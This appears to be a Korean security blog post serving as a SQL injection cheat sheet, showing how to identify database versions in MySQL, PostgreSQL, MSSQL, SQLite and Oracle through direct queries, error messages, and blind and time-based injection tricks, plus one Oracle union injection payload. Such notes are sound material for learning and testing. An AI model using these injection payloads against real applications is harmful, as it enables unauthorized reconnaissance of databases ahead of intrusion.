Notice
Recent Posts
Recent Comments
250x250
반응형
«   2025/08   »
1 2
3 4 5 6 7 8 9
10 11 12 13 14 15 16
17 18 19 20 21 22 23
24 25 26 27 28 29 30
31
Archives
Today
Total
관리 메뉴

Tyojong

[SQLI] DBMS 버전 정보 본문

web/basic knowledge

[SQLI] DBMS 버전 정보

Tyojong 2025. 7. 21. 11:41
반응형

MYSQL

버전 확인

mysql> select @@version;
mysql> select version();

에러 메시지로 DBMS 확인

mysql> select 1 union select 1, 2;

Blind SQLI를 이용한 버전 확인

# @@version => '5.7.29-0ubuntu0.16.04.', mid(@@version, 1, 1) => '5'
mysql> select mid(@@version, 1, 1)='5';
+------------------------+
| mid(@@version,1,1)='5' |
+------------------------+
|                      1 |
+------------------------+
1 row in set (0.00 sec)
mysql> select mid(@@version, 1, 1)='6';
+------------------------+
| mid(@@version,1,1)='6' |
+------------------------+
|                      0 |
+------------------------+
1 row in set (0.00 sec)

Time based SQLI를 이용한 버전 확인

mysql> select mid(@@version, 1, 1)='6' and sleep(2);
+---------------------------------------+
| mid(@@version, 1, 1)='6' and sleep(2) |
+---------------------------------------+
|                                     0 |
+---------------------------------------+
1 row in set (0.00 sec)
mysql> select mid(@@version, 1, 1)='5' and sleep(2);
+---------------------------------------+
| mid(@@version, 1, 1)='5' and sleep(2) |
+---------------------------------------+
|                                     0 |
+---------------------------------------+
1 row in set (2.00 sec)

PostgreSQL

버전 확인

postgres=$ select version();

에러 메시지로 DBMS 확인

postgres=$ select 1 union select 1, 2;

Blind SQLI를 통한 버전 정보 확인

/* version() => 'PostgreSQL ...', substr(version(), 1, 1) => 'P' */
postgres=$ select substr(version(), 1, 1)='P';
 ?column?
----------
 t
(1 row)
postgres=# select substr(version(), 1, 1)='Q';
 ?column?
----------
 f
(1 row)

MSSQL

버전 확인

> select @@version;

에러 메시지로 DBMS 확인

> select 1 union select 1, 2;

Blind SQLI를 통한 버전 정보 확인

-- @@version => 'Microsoft SQL Server...', substring(@@version, 1, 1) => 'M'
> select 1 from test where substring(@@version, 1, 1)='M';
-----------
          1
(1 rows affected)
> select 1 from test where substring(@@version, 1, 1)='N';
-----------
(0 rows affected)

Time based SQLI를 이용한 버전 확인

> select '' if(substring(@@version, 1, 1)='M') waitfor delay '0:0:5';

SQLite

버전 확인

sqlite> select sqlite_version();

에러 메시지로 DBMS 확인

sqlite> select 1 union select 1, 2;

Blind SQLI를 이용한 버전 확인

-- sqlite_version() => '3.11.0', substr(sqlite_version(), 1, 1) => '3'
sqlite> select substr(sqlite_version(), 1, 1)='3';
1
sqlite> select substr(sqlite_version(), 1, 1)='4';
0

Time based SQLI를 이용한 버전 확인

select case when substr(sqlite_version(), 1, 1)='3' then LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(300000000/2)))) else 1=1 end;

Oracle

버전 확인

SELECT version FROM v$instance;
SELECT * FROM v$version;
' union select '', banner from v$version--%20
728x90

'web > basic knowledge' 카테고리의 다른 글

[XSS] 필터링 우회  (0) 2025.07.24
[SQLI] DB 종류 별 System Table  (0) 2025.07.21
'web/basic knowledge' Related Articles more